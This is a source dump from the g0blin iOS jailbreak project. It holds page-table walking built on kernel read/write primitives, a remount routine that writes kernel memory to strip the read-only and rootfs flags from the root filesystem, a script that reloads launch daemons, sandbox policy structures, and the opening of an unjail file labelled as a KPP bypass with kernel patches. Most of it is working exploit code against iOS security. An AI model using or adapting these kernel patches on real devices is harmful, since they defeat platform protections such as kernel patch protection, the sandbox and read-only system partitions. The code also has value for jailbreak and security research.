22 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 23 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 24 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 25 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 26 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 27 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 28 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 29 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 30 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 31 | 32 | typedef union VMA_4K { 33 | struct { 34 | uint64_t block_off : 12; 35 | uint64_t level3_index : 9; 36 | uint64_t level2_index : 9; 37 | uint64_t level1_index : 9; 38 | uint64_t level0_index : 9; 39 | uint64_t ttbr_selector : 16; 40 | } __attribute__((packed)) vm_info; 41 | uint64_t vmaddr; 42 | } VMA_4K; 43 | typedef union VMA_16K { 44 | struct { 45 | uint64_t block_off : 14; 46 | uint64_t level3_index : 11; 47 | uint64_t level2_index : 11; 48 | uint64_t level1_index : 11; 49 | uint64_t level0_index : 1; 50 | uint64_t ttbr_selector : 16; 51 | } __attribute__((packed)) vm_info; 52 | uint64_t vmaddr; 53 | } VMA_16K; 54 | 55 | VMA_16K vad16; 56 | VMA_4K vad4; 57 | char isvad = 0; 58 | 59 | #define TTELog NSLog 60 | vm_size_t sz = 0; 61 | 62 | void checkvad() { 63 | if (!sz) { 64 | struct utsname u = { 0 }; 65 | uname(&u); 66 | host_page_size(mach_host_self(), &sz); 67 | printf("[INFO]: checkvad: %lx %x\n", sz, getpagesize()); 68 | if (strstr(u.machine, "iPad5,") == u.machine) { 69 | sz = 4096; // this is 4k but host_page_size lies to us 70 | } 71 | assert(sz); 72 | if (sz == 4096) { 73 | isvad = 1; 74 | } 75 | } 76 | } 77 | 78 | void parse_block_tte(uint64_t tte) { 79 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 80 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 81 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 82 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 83 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 84 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 85 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 86 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 87 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 88 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 89 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 90 | } 91 | 92 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 93 | 94 | checkvad(); 95 | if (!table) table = level1_table; 96 | if (!level) level = 1; 97 | 98 | vm_address_t tteaddr = 0; 99 | 100 | 101 | 102 | if (sz == 4096) { 103 | VMA_4K target_addr; 104 | target_addr.vmaddr = vmaddr; 105 | 106 | if (level == 1) { 107 | target_addr.vm_info.level1_index -= 0x1c0; 108 | } 109 | 110 | switch (level) { 111 | case 0: 112 | tteaddr = table + TTE_INDEX(target_addr, level0); 113 | break; 114 | case 1: 115 | tteaddr = table + TTE_INDEX(target_addr, level1); 116 | break; 117 | 118 | case 2: 119 | tteaddr = table + TTE_INDEX(target_addr, level2); 120 | break; 121 | 122 | case 3: 123 | tteaddr = table + TTE_INDEX(target_addr, level3); 124 | break; 125 | 126 | default: 127 | break; 128 | } 129 | 130 | } else if (sz == 4096*4) { 131 | VMA_16K target_addr; 132 | target_addr.vmaddr = vmaddr; 133 | 134 | switch (level) { 135 | case 0: 136 | tteaddr = table + TTE_INDEX(target_addr, level0); 137 | break; 138 | case 1: 139 | tteaddr = table + TTE_INDEX(target_addr, level1); 140 | break; 141 | 142 | case 2: 143 | tteaddr = table + TTE_INDEX(target_addr, level2); 144 | break; 145 | 146 | case 3: 147 | tteaddr = table + TTE_INDEX(target_addr, level3); 148 | break; 149 | 150 | default: 151 | break; 152 | } 153 | 154 | 155 | } 156 | 157 | //parse_block_tte(level1_entry); 158 | 159 | pagestuff_64_callback(tteaddr, level); 160 | 161 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 162 | 163 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 164 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 165 | } 166 | } 167 | 168 | uint64_t findphys_real(uint64_t virtaddr) { 169 | __block uint64_t physvar = 0; 170 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 171 | uint64_t tte = ReadAnywhere64(tte_addr); 172 | if (addr == 3) {\ 173 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 174 | } 175 | }, level1_table, isvad ? 1 : 2); 176 | 177 | return physvar; 178 | 179 | } 180 | 181 | extern task_t tfp0; 182 | 183 | uint64_t physalloc(uint64_t size) { 184 | uint64_t ret = 0; 185 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 186 | return ret; 187 | } 188 | 189 | -------------------------------------------------------------------------------- /g0blin/reload: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ## do run commands in /etc/rc.d 4 | for file in /etc/rc.d/*; do 5 | echo "$file" 6 | $file 7 | done 8 | sleep 1 9 | 10 | ## Unload Launch Daemons 11 | launchctl unload $(ls /System/Library/LaunchDaemons/ | grep -v logd | grep -v fud | grep -v ReportCrash | while read a; do printf /System/Library/LaunchDaemons/$a\ ; done) 12 | launchctl unload /System/Library/NanoLaunchDaemons 13 | sleep 1 14 | 15 | ## Load Launch Daemons 16 | launchctl load /System/Library/LaunchDaemons 17 | launchctl load /System/Library/NanoLaunchDaemons 18 | launchctl load /Library/LaunchDaemons 19 | sleep 1 20 | 21 | ## OpenSSH workaround (launchdaemon won't load on iOS 10+) 22 | launchctl unload /Library/LaunchDaemons/com.openssh.sshd.plist;/usr/libexec/sshd-keygen-wrapper 23 | sleep 1 24 | 25 | ## Restart SpringBoard/BackBoard for extension loading 26 | #launchctl stop com.apple.backboardd 27 | #killall backboardd SpringBoard 28 | 29 | exit 0 30 | -------------------------------------------------------------------------------- /g0blin/remount.h: -------------------------------------------------------------------------------- 1 | // 2 | // remount.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-27. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // Copyright © 2017 qwertyoruiop. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | 13 | kern_return_t do_remount(uint64_t slide); 14 | -------------------------------------------------------------------------------- /g0blin/remount.m: -------------------------------------------------------------------------------- 1 | // 2 | // remount.m 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-27. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // Copyright © 2017 qwertyoruiop. All rights reserved. 8 | // 9 | 10 | #import "offsets.h" 11 | #import "common.h" 12 | #import "kernel.h" 13 | #include 14 | 15 | static const uint64_t KSTRUCT_OFFSET_MOUNT_MNT_FLAG = 0x70; 16 | static const uint64_t KSTRUCT_OFFSET_VNODE_V_UN = 0xd8; 17 | 18 | 19 | kern_return_t do_remount(uint64_t slide) { 20 | uint64_t _rootnode = OFFSET_ROOTVNODE + slide; 21 | uint64_t rootfs_vnode = rk64(_rootnode); 22 | 23 | // read flags 24 | uint64_t v_mount = rk64(rootfs_vnode + KSTRUCT_OFFSET_VNODE_V_UN); 25 | uint32_t v_flag = rk32(v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG); 26 | 27 | // unset flags 28 | v_flag = v_flag & ~MNT_NOSUID; // necessary? 29 | v_flag = v_flag & ~MNT_RDONLY; 30 | 31 | // write new flags, temporarily unsetting rootfs flag 32 | wk32(v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG, v_flag & ~MNT_ROOTFS); 33 | 34 | // remount 35 | char *nmz = strdup("/dev/disk0s1s1"); 36 | int lolr = mount("apfs", "/", MNT_UPDATE, (void *)&nmz); 37 | if (lolr == -1) { 38 | LOG("ERROR: could not remount '/'"); 39 | return KERN_FAILURE; 40 | } 41 | LOG("successfully remounted '/'"); 42 | 43 | // set rootfs flag again 44 | v_mount = rk64(rootfs_vnode + KSTRUCT_OFFSET_VNODE_V_UN); 45 | wk32(v_mount + KSTRUCT_OFFSET_MOUNT_MNT_FLAG, v_flag); 46 | 47 | return KERN_SUCCESS; 48 | } 49 | -------------------------------------------------------------------------------- /g0blin/sbops.h: -------------------------------------------------------------------------------- 1 | // 2 | // sbops.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2018-01-30. 6 | // Copyright © 2018 Sticktron. All rights reserved. 7 | // 8 | 9 | #include 10 | 11 | struct mac_policy_ops{ 12 | uint64_t mpo_audit_check_postselect; 13 | uint64_t mpo_audit_check_preselect; 14 | uint64_t mpo_bpfdesc_label_associate; 15 | uint64_t mpo_bpfdesc_label_destroy; 16 | uint64_t mpo_bpfdesc_label_init; 17 | uint64_t mpo_bpfdesc_check_receive; 18 | uint64_t mpo_cred_check_label_update_execve; 19 | uint64_t mpo_cred_check_label_update; 20 | uint64_t mpo_cred_check_visible; 21 | uint64_t mpo_cred_label_associate_fork; 22 | uint64_t mpo_cred_label_associate_kernel; 23 | uint64_t mpo_cred_label_associate; 24 | uint64_t mpo_cred_label_associate_user; 25 | uint64_t mpo_cred_label_destroy; 26 | uint64_t mpo_cred_label_externalize_audit; 27 | uint64_t mpo_cred_label_externalize; 28 | uint64_t mpo_cred_label_init; 29 | uint64_t mpo_cred_label_internalize; 30 | uint64_t mpo_cred_label_update_execve; 31 | uint64_t mpo_cred_label_update; 32 | uint64_t mpo_devfs_label_associate_device; 33 | uint64_t mpo_devfs_label_associate_directory; 34 | uint64_t mpo_devfs_label_copy; 35 | uint64_t mpo_devfs_label_destroy; 36 | uint64_t mpo_devfs_label_init; 37 | uint64_t mpo_devfs_label_update; 38 | uint64_t mpo_file_check_change_offset; 39 | uint64_t mpo_file_check_create; 40 | uint64_t mpo_file_check_dup; 41 | uint64_t mpo_file_check_fcntl; 42 | uint64_t mpo_file_check_get_offset; 43 | uint64_t mpo_file_check_get; 44 | uint64_t mpo_file_check_inherit; 45 | uint64_t mpo_file_check_ioctl; 46 | uint64_t mpo_file_check_lock; 47 | uint64_t mpo_file_check_mmap_downgrade; 48 | uint64_t mpo_file_check_mmap; 49 | uint64_t mpo_file_check_receive; 50 | uint64_t mpo_file_check_set; 51 | uint64_t mpo_file_label_init; 52 | uint64_t mpo_file_label_destroy; 53 | uint64_t mpo_file_label_associate; 54 | uint64_t mpo_ifnet_check_label_update; 55 | uint64_t mpo_ifnet_check_transmit; 56 | uint64_t mpo_ifnet_label_associate; 57 | uint64_t mpo_ifnet_label_copy; 58 | uint64_t mpo_ifnet_label_destroy; 59 | uint64_t mpo_ifnet_label_externalize; 60 | uint64_t mpo_ifnet_label_init; 61 | uint64_t mpo_ifnet_label_internalize; 62 | uint64_t mpo_ifnet_label_update; 63 | uint64_t mpo_ifnet_label_recycle; 64 | uint64_t mpo_inpcb_check_deliver; 65 | uint64_t mpo_inpcb_label_associate; 66 | uint64_t mpo_inpcb_label_destroy; 67 | uint64_t mpo_inpcb_label_init; 68 | uint64_t mpo_inpcb_label_recycle; 69 | uint64_t mpo_inpcb_label_update; 70 | uint64_t mpo_iokit_check_device; 71 | uint64_t mpo_ipq_label_associate; 72 | uint64_t mpo_ipq_label_compare; 73 | uint64_t mpo_ipq_label_destroy; 74 | uint64_t mpo_ipq_label_init; 75 | uint64_t mpo_ipq_label_update; 76 | uint64_t mpo_file_check_library_validation; 77 | uint64_t mpo_vnode_notify_setacl; 78 | uint64_t mpo_vnode_notify_setattrlist; 79 | uint64_t mpo_vnode_notify_setextattr; 80 | uint64_t mpo_vnode_notify_setflags; 81 | uint64_t mpo_vnode_notify_setmode; 82 | uint64_t mpo_vnode_notify_setowner; 83 | uint64_t mpo_vnode_notify_setutimes; 84 | uint64_t mpo_vnode_notify_truncate; 85 | uint64_t mpo_mbuf_label_associate_bpfdesc; 86 | uint64_t mpo_mbuf_label_associate_ifnet; 87 | uint64_t mpo_mbuf_label_associate_inpcb; 88 | uint64_t mpo_mbuf_label_associate_ipq; 89 | uint64_t mpo_mbuf_label_associate_linklayer; 90 | uint64_t mpo_mbuf_label_associate_multicast_encap; 91 | uint64_t mpo_mbuf_label_associate_netlayer; 92 | uint64_t mpo_mbuf_label_associate_socket; 93 | uint64_t mpo_mbuf_label_copy; 94 | uint64_t mpo_mbuf_label_destroy; 95 | uint64_t mpo_mbuf_label_init; 96 | uint64_t mpo_mount_check_fsctl; 97 | uint64_t mpo_mount_check_getattr; 98 | uint64_t mpo_mount_check_label_update; 99 | uint64_t mpo_mount_check_mount; 100 | uint64_t mpo_mount_check_remount; 101 | uint64_t mpo_mount_check_setattr; 102 | uint64_t mpo_mount_check_stat; 103 | uint64_t mpo_mount_check_umount; 104 | uint64_t mpo_mount_label_associate; 105 | uint64_t mpo_mount_label_destroy; 106 | uint64_t mpo_mount_label_externalize; 107 | uint64_t mpo_mount_label_init; 108 | uint64_t mpo_mount_label_internalize; 109 | uint64_t mpo_netinet_fragment; 110 | uint64_t mpo_netinet_icmp_reply; 111 | uint64_t mpo_netinet_tcp_reply; 112 | uint64_t mpo_pipe_check_ioctl; 113 | uint64_t mpo_pipe_check_kqfilter; 114 | uint64_t mpo_pipe_check_label_update; 115 | uint64_t mpo_pipe_check_read; 116 | uint64_t mpo_pipe_check_select; 117 | uint64_t mpo_pipe_check_stat; 118 | uint64_t mpo_pipe_check_write; 119 | uint64_t mpo_pipe_label_associate; 120 | uint64_t mpo_pipe_label_copy; 121 | uint64_t mpo_pipe_label_destroy; 122 | uint64_t mpo_pipe_label_externalize; 123 | uint64_t mpo_pipe_label_init; 124 | uint64_t mpo_pipe_label_internalize; 125 | uint64_t mpo_pipe_label_update; 126 | uint64_t mpo_policy_destroy; 127 | uint64_t mpo_policy_init; 128 | uint64_t mpo_policy_initbsd; 129 | uint64_t mpo_policy_syscall; 130 | uint64_t mpo_system_check_sysctlbyname; 131 | uint64_t mpo_proc_check_inherit_ipc_ports; 132 | uint64_t mpo_vnode_check_rename; 133 | uint64_t mpo_kext_check_query; 134 | uint64_t mpo_iokit_check_nvram_get; 135 | uint64_t mpo_iokit_check_nvram_set; 136 | uint64_t mpo_iokit_check_nvram_delete; 137 | uint64_t mpo_proc_check_expose_task; 138 | uint64_t mpo_proc_check_set_host_special_port; 139 | uint64_t mpo_proc_check_set_host_exception_port; 140 | uint64_t mpo_exc_action_check_exception_send; 141 | uint64_t mpo_exc_action_label_associate; 142 | uint64_t mpo_exc_action_label_copy; 143 | uint64_t mpo_exc_action_label_destroy; 144 | uint64_t mpo_exc_action_label_init; 145 | uint64_t mpo_exc_action_label_update; 146 | uint64_t mpo_reserved1; 147 | uint64_t mpo_reserved2; 148 | uint64_t mpo_reserved3; 149 | uint64_t mpo_reserved4; 150 | uint64_t mpo_reserved5; 151 | uint64_t mpo_reserved6; 152 | uint64_t mpo_posixsem_check_create; 153 | uint64_t mpo_posixsem_check_open; 154 | uint64_t mpo_posixsem_check_post; 155 | uint64_t mpo_posixsem_check_unlink; 156 | uint64_t mpo_posixsem_check_wait; 157 | uint64_t mpo_posixsem_label_associate; 158 | uint64_t mpo_posixsem_label_destroy; 159 | uint64_t mpo_posixsem_label_init; 160 | uint64_t mpo_posixshm_check_create; 161 | uint64_t mpo_posixshm_check_mmap; 162 | uint64_t mpo_posixshm_check_open; 163 | uint64_t mpo_posixshm_check_stat; 164 | uint64_t mpo_posixshm_check_truncate; 165 | uint64_t mpo_posixshm_check_unlink; 166 | uint64_t mpo_posixshm_label_associate; 167 | uint64_t mpo_posixshm_label_destroy; 168 | uint64_t mpo_posixshm_label_init; 169 | uint64_t mpo_proc_check_debug; 170 | uint64_t mpo_proc_check_fork; 171 | uint64_t mpo_proc_check_get_task_name; 172 | uint64_t mpo_proc_check_get_task; 173 | uint64_t mpo_proc_check_getaudit; 174 | uint64_t mpo_proc_check_getauid; 175 | uint64_t mpo_proc_check_getlcid; 176 | uint64_t mpo_proc_check_mprotect; 177 | uint64_t mpo_proc_check_sched; 178 | uint64_t mpo_proc_check_setaudit; 179 | uint64_t mpo_proc_check_setauid; 180 | uint64_t mpo_proc_check_setlcid; 181 | uint64_t mpo_proc_check_signal; 182 | uint64_t mpo_proc_check_wait; 183 | uint64_t mpo_proc_label_destroy; 184 | uint64_t mpo_proc_label_init; 185 | uint64_t mpo_socket_check_accept; 186 | uint64_t mpo_socket_check_accepted; 187 | uint64_t mpo_socket_check_bind; 188 | uint64_t mpo_socket_check_connect; 189 | uint64_t mpo_socket_check_create; 190 | uint64_t mpo_socket_check_deliver; 191 | uint64_t mpo_socket_check_kqfilter; 192 | uint64_t mpo_socket_check_label_update; 193 | uint64_t mpo_socket_check_listen; 194 | uint64_t mpo_socket_check_receive; 195 | uint64_t mpo_socket_check_received; 196 | uint64_t mpo_socket_check_select; 197 | uint64_t mpo_socket_check_send; 198 | uint64_t mpo_socket_check_stat; 199 | uint64_t mpo_socket_check_setsockopt; 200 | uint64_t mpo_socket_check_getsockopt; 201 | uint64_t mpo_socket_label_associate_accept; 202 | uint64_t mpo_socket_label_associate; 203 | uint64_t mpo_socket_label_copy; 204 | uint64_t mpo_socket_label_destroy; 205 | uint64_t mpo_socket_label_externalize; 206 | uint64_t mpo_socket_label_init; 207 | uint64_t mpo_socket_label_internalize; 208 | uint64_t mpo_socket_label_update; 209 | uint64_t mpo_socketpeer_label_associate_mbuf; 210 | uint64_t mpo_socketpeer_label_associate_socket; 211 | uint64_t mpo_socketpeer_label_destroy; 212 | uint64_t mpo_socketpeer_label_externalize; 213 | uint64_t mpo_socketpeer_label_init; 214 | uint64_t mpo_system_check_acct; 215 | uint64_t mpo_system_check_audit; 216 | uint64_t mpo_system_check_auditctl; 217 | uint64_t mpo_system_check_auditon; 218 | uint64_t mpo_system_check_host_priv; 219 | uint64_t mpo_system_check_nfsd; 220 | uint64_t mpo_system_check_reboot; 221 | uint64_t mpo_system_check_settime; 222 | uint64_t mpo_system_check_swapoff; 223 | uint64_t mpo_system_check_swapon; 224 | uint64_t mpo_reserved7; 225 | uint64_t mpo_sysvmsg_label_associate; 226 | uint64_t mpo_sysvmsg_label_destroy; 227 | uint64_t mpo_sysvmsg_label_init; 228 | uint64_t mpo_sysvmsg_label_recycle; 229 | uint64_t mpo_sysvmsq_check_enqueue; 230 | uint64_t mpo_sysvmsq_check_msgrcv; 231 | uint64_t mpo_sysvmsq_check_msgrmid; 232 | uint64_t mpo_sysvmsq_check_msqctl; 233 | uint64_t mpo_sysvmsq_check_msqget; 234 | uint64_t mpo_sysvmsq_check_msqrcv; 235 | uint64_t mpo_sysvmsq_check_msqsnd; 236 | uint64_t mpo_sysvmsq_label_associate; 237 | uint64_t mpo_sysvmsq_label_destroy; 238 | uint64_t mpo_sysvmsq_label_init; 239 | uint64_t mpo_sysvmsq_label_recycle; 240 | uint64_t mpo_sysvsem_check_semctl; 241 | uint64_t mpo_sysvsem_check_semget; 242 | uint64_t mpo_sysvsem_check_semop; 243 | uint64_t mpo_sysvsem_label_associate; 244 | uint64_t mpo_sysvsem_label_destroy; 245 | uint64_t mpo_sysvsem_label_init; 246 | uint64_t mpo_sysvsem_label_recycle; 247 | uint64_t mpo_sysvshm_check_shmat; 248 | uint64_t mpo_sysvshm_check_shmctl; 249 | uint64_t mpo_sysvshm_check_shmdt; 250 | uint64_t mpo_sysvshm_check_shmget; 251 | uint64_t mpo_sysvshm_label_associate; 252 | uint64_t mpo_sysvshm_label_destroy; 253 | uint64_t mpo_sysvshm_label_init; 254 | uint64_t mpo_sysvshm_label_recycle; 255 | uint64_t mpo_reserved8; 256 | uint64_t mpo_reserved9; 257 | uint64_t mpo_vnode_check_getattr; 258 | uint64_t mpo_mount_check_snapshot_create; 259 | uint64_t mpo_mount_check_snapshot_delete; 260 | uint64_t mpo_vnode_check_clone; 261 | uint64_t mpo_proc_check_get_cs_info; 262 | uint64_t mpo_proc_check_set_cs_info; 263 | uint64_t mpo_iokit_check_hid_control; 264 | uint64_t mpo_vnode_check_access; 265 | uint64_t mpo_vnode_check_chdir; 266 | uint64_t mpo_vnode_check_chroot; 267 | uint64_t mpo_vnode_check_create; 268 | uint64_t mpo_vnode_check_deleteextattr; 269 | uint64_t mpo_vnode_check_exchangedata; 270 | uint64_t mpo_vnode_check_exec; 271 | uint64_t mpo_vnode_check_getattrlist; 272 | uint64_t mpo_vnode_check_getextattr; 273 | uint64_t mpo_vnode_check_ioctl; 274 | uint64_t mpo_vnode_check_kqfilter; 275 | uint64_t mpo_vnode_check_label_update; 276 | uint64_t mpo_vnode_check_link; 277 | uint64_t mpo_vnode_check_listextattr; 278 | uint64_t mpo_vnode_check_lookup; 279 | uint64_t mpo_vnode_check_open; 280 | uint64_t mpo_vnode_check_read; 281 | uint64_t mpo_vnode_check_readdir; 282 | uint64_t mpo_vnode_check_readlink; 283 | uint64_t mpo_vnode_check_rename_from; 284 | uint64_t mpo_vnode_check_rename_to; 285 | uint64_t mpo_vnode_check_revoke; 286 | uint64_t mpo_vnode_check_select; 287 | uint64_t mpo_vnode_check_setattrlist; 288 | uint64_t mpo_vnode_check_setextattr; 289 | uint64_t mpo_vnode_check_setflags; 290 | uint64_t mpo_vnode_check_setmode; 291 | uint64_t mpo_vnode_check_setowner; 292 | uint64_t mpo_vnode_check_setutimes; 293 | uint64_t mpo_vnode_check_stat; 294 | uint64_t mpo_vnode_check_truncate; 295 | uint64_t mpo_vnode_check_unlink; 296 | uint64_t mpo_vnode_check_write; 297 | uint64_t mpo_vnode_label_associate_devfs; 298 | uint64_t mpo_vnode_label_associate_extattr; 299 | uint64_t mpo_vnode_label_associate_file; 300 | uint64_t mpo_vnode_label_associate_pipe; 301 | uint64_t mpo_vnode_label_associate_posixsem; 302 | uint64_t mpo_vnode_label_associate_posixshm; 303 | uint64_t mpo_vnode_label_associate_singlelabel; 304 | uint64_t mpo_vnode_label_associate_socket; 305 | uint64_t mpo_vnode_label_copy; 306 | uint64_t mpo_vnode_label_destroy; 307 | uint64_t mpo_vnode_label_externalize_audit; 308 | uint64_t mpo_vnode_label_externalize; 309 | uint64_t mpo_vnode_label_init; 310 | uint64_t mpo_vnode_label_internalize; 311 | uint64_t mpo_vnode_label_recycle; 312 | uint64_t mpo_vnode_label_store; 313 | uint64_t mpo_vnode_label_update_extattr; 314 | uint64_t mpo_vnode_label_update; 315 | uint64_t mpo_vnode_notify_create; 316 | uint64_t mpo_vnode_check_signature; 317 | uint64_t mpo_vnode_check_uipc_bind; 318 | uint64_t mpo_vnode_check_uipc_connect; 319 | uint64_t mpo_proc_check_run_cs_invalid; 320 | uint64_t mpo_proc_check_suspend_resume; 321 | uint64_t mpo_thread_userret; 322 | uint64_t mpo_iokit_check_set_properties; 323 | uint64_t mpo_system_check_chud; 324 | uint64_t mpo_vnode_check_searchfs; 325 | uint64_t mpo_priv_check; 326 | uint64_t mpo_priv_grant; 327 | uint64_t mpo_proc_check_map_anon; 328 | uint64_t mpo_vnode_check_fsgetpath; 329 | uint64_t mpo_iokit_check_open; 330 | uint64_t mpo_proc_check_ledger; 331 | uint64_t mpo_vnode_notify_rename; 332 | uint64_t mpo_vnode_check_setacl; 333 | uint64_t mpo_vnode_notify_deleteextattr; 334 | uint64_t mpo_system_check_kas_info; 335 | uint64_t mpo_proc_check_cpumon; 336 | uint64_t mpo_vnode_notify_open; 337 | uint64_t mpo_system_check_info; 338 | uint64_t mpo_pty_notify_grant; 339 | uint64_t mpo_pty_notify_close; 340 | uint64_t mpo_vnode_find_sigs; 341 | uint64_t mpo_kext_check_load; 342 | uint64_t mpo_kext_check_unload; 343 | uint64_t mpo_proc_check_proc_info; 344 | uint64_t mpo_vnode_notify_link; 345 | uint64_t mpo_iokit_check_filter_properties; 346 | uint64_t mpo_iokit_check_get_property; 347 | }; 348 | 349 | 350 | -------------------------------------------------------------------------------- /g0blin/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sticktron/g0blin/83a6c944eac827f93d84aeb4d61afdf204ac5446/g0blin/tar -------------------------------------------------------------------------------- /g0blin/unjail.h: -------------------------------------------------------------------------------- 1 | // 2 | // unjail.h 3 | // g0blin 4 | // 5 | // Created by Sticktron on 2017-12-26. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // Copyright © 2017 qwertyoruiop. All rights reserved. 8 | // 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | 23 | kern_return_t do_unjail(task_t tfp0, uint64_t slide, uint64_t kern_cred, uint64_t self_cred, uint64_t selfproc); 24 | 25 | size_t kread(uint64_t where, void *p, size_t size); 26 | uint64_t kread_uint64(uint64_t where); 27 | uint32_t kread_uint32(uint64_t where); 28 | size_t kwrite(uint64_t where, const void *p, size_t size); 29 | size_t kwrite_uint64(uint64_t where, uint64_t value); 30 | size_t kwrite_uint32(uint64_t where, uint32_t value); 31 | 32 | void kx2(uint64_t fptr, uint64_t arg1, uint64_t arg2); 33 | uint32_t kx5(uint64_t fptr, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t arg4, uint64_t arg5); 34 | 35 | kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 36 | kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); 37 | kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); 38 | kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); 39 | 40 | #define ReadAnywhere32 kread_uint32 41 | #define WriteAnywhere32 kwrite_uint32 42 | #define ReadAnywhere64 kread_uint64 43 | #define WriteAnywhere64 kwrite_uint64 44 | 45 | #define copyin(to, from, size) kread(from, to, size) 46 | #define copyout(to, from, size) kwrite(to, from, size) 47 | 48 | #define offset_p_pid 0x10 49 | #define offset_p_cred 0x100 50 | #define offset_p_comm 0x26c 51 | #define offset_p_csflags 0x2a8 52 | 53 | #define CS_VALID 0x0000001 /* dynamically valid */ 54 | #define CS_ADHOC 0x0000002 /* ad hoc signed */ 55 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 56 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 57 | 58 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 59 | #define CS_KILL 0x0000200 /* kill process if it becomes invalid */ 60 | #define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */ 61 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 62 | #define CS_ENFORCEMENT 0x0001000 /* require enforcement */ 63 | #define CS_REQUIRE_LV 0x0002000 /* require library validation */ 64 | #define CS_ENTITLEMENTS_VALIDATED 0x0004000 65 | 66 | #define CS_ALLOWED_MACHO 0x00ffffe 67 | 68 | #define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */ 69 | #define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */ 70 | #define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */ 71 | #define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */ 72 | 73 | #define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */ 74 | #define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */ 75 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 76 | #define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */ 77 | 78 | -------------------------------------------------------------------------------- /g0blin/unjail.m: -------------------------------------------------------------------------------- 1 | // 2 | // unjail.m 3 | // g0blin 4 | // 5 | // This is qwertyoruiop's KPP bypass, along with kernel patches. 6 | // 7 | // Created by Sticktron on 2017-12-26. 8 | // Copyright © 2017 Sticktron. All rights reserved. 9 | // Copyright © 2017 qwertyoruiop. All rights reserved. 10 | // 11 | 12 | #import "unjail.h" 13 | #import "offsets.h" 14 | #import "kernel.h" 15 | #import "sbops.h" 16 | #import "pte_stuff.h" 17 | #include "patchfinder64.h" 18 | 19 | 20 | #define INSN_NOP 0xd503201f 21 | 22 | 23 | extern task_t tfp0; // for pte_stuff.h 24 | 25 | 26 | kern_return_t do_unjail(task_t tfpzero, uint64_t slide, uint64_t kern_cred, uint64_t self_cred, uint64_t self_proc) { 27 | kern_return_t ret = KERN_FAILURE; 28 | 